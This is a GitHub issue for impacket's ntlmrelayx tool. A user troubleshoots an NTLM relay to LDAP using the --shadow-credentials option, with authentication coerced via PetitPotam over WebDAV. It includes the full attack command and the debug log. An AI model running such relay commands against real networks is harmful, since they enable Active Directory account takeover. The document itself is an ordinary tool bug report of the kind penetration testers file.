ntlmrelayx does not seem to handle authentications
Muz1K1zuM opened this issue · 3 comments
Configuration
impacket version: Impacket v0.13.0.dev
Python version: Python 3.11.2
Target OS: Debian 6.1.37-1
Debug Output With Command String
sudo proxychains python3 ntlmrelayx.py -debug --http-port 8000 -t ldap://##.##.##.## --shadow-credentials
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20240916.171021.65b774de-py3.11.egg/impacket
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 8000
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[*] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[*] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[*] HTTPD(8000): Client requested path: /a/pipe/srvsvc
Analyzing requests with Wireshark:
It seems that auth is not changing to NTLM.
Additional context
Not sure if it is an ntlmrelayx issue, but when I force an authentication through HTTP (WebDAV), running PetitPotam, it seems that ntlmrelayx does not properly handle the NTLM authentication. Any clue about this?